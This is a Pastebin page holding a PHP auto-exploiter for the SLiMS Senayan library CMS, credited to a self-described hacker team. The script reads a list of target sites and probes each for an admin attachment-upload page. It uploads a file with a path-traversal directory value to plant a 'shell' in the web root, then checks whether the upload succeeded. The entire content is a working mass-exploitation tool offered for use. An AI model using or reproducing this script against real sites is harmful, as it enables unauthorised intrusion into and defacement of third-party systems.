API tools faq
paste
ToKeiChun

SLiMS CMS Senayan Auto Upload

ToKeiChun
Jan 2nd, 2020
665
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.80 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. /*
  3. # Mr.ToKeiChun69 from Cyberizm Digital Security Team
  4. # Our Security Forum : cyberizm.org
  5. # Twitter : twitter.com/kngskrplls
  6.  
  7. # your list.txt must a single directory with this exploiter #
  8.  
  9. ###############################################
  10.  
  11. # This Exploit and Vulnerability was discovered by Mr.ToKeiChun69
  12. # Thanks for All Moslem Hackers and Cyberizm Digital Security Team
  13. # This Exploiter may sometimes couldn't work %100 because sometimes the bot don't understand the command.
  14. # If the command don't understand the command, please exploit it manually.
  15.  
  16. # Special thanks : All Moslem Hackers and Cyberizm Digital Security Team
  17.  
  18. #################################################
  19. # note : Please do not remove Cyberizm copyright.
  20.  
  21.  
  22. # This Exploit Coded By Mr.ToKeiChun69 from Cyberizm Digital Security Team
  23. */
  24. echo "
  25.  
  26. File Attachment Auto Exploiter - coded by Mr.ToKeiChun69
  27.  
  28. $ Thanks for All Moslem Hackers and Cyberizm Digital Security Team
  29.  
  30. ";
  31. echo "Input your target list: ";
  32. $list = trim(fgets(STDIN));
  33.  
  34. $shell = "changelog.txt";
  35. $exploit = "/admin/modules/bibliography/pop_attach.php?biblioID=0";
  36.  
  37. $open = fopen("$list","r");
  38. $size = filesize("$list");
  39. $read = fread($open,$size);
  40. $lists = explode("\r\n",$read);
  41.  
  42. echo "\n";
  43.  
  44. foreach($lists as $target){
  45. if(!preg_match("/^http:\/\//",$target) AND !preg_match("/^https:\/\//",$target)){
  46. $targets = "http://$target";
  47. }else{
  48. $targets = $target;
  49. }
  50.  
  51. echo "Target => $targets\n";
  52. echo " [*] Checking Path : ";
  53.  
  54. $cd = curl_init("$targets$exploit");
  55. curl_setopt($cd, CURLOPT_FOLLOWLOCATION, 1);
  56. curl_setopt($cd, CURLOPT_RETURNTRANSFER, 1);
  57. curl_exec($cd);
  58. $httpcode = curl_getinfo($cd, CURLINFO_HTTP_CODE);
  59. curl_close($cd);
  60.  
  61. if($httpcode == 200){
  62. echo "200 OK\n";
  63. echo " [*] Uploading shell : ";
  64. $ch = curl_init();
  65. curl_setopt($ch, CURLOPT_URL, "$targets/$exploit");
  66. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  67. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  68. curl_setopt($ch, CURLOPT_POST, 1);
  69. curl_setopt($ch, CURLOPT_POSTFIELDS, array("fileTitle"=>"CyBeRiZM" , "fileDir"=>"../" , "file2attach"=>"@$shell" , "upload"=>"Unggah Sekarang"));
  70. curl_exec($ch);
  71.  
  72. $cek = curl_init();
  73. curl_setopt($cek, CURLOPT_URL, "$targets/$shell");
  74. curl_setopt($cek, CURLOPT_FOLLOWLOCATION, 1);
  75. curl_setopt($cek, CURLOPT_RETURNTRANSFER, 1);
  76. $ceek = curl_exec($cek);
  77. $ceeks = curl_getinfo($cek, CURLINFO_HTTP_CODE);
  78.  
  79. if(preg_match("/hacked/",$ceek) or $ceeks == 200){
  80. echo "OK $targets/$shell\n";
  81. }else{
  82. echo "Failed\n\n";
  83. }
  84. }else{
  85. echo "Not Vulnerable\n\n";
  86. }
  87. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!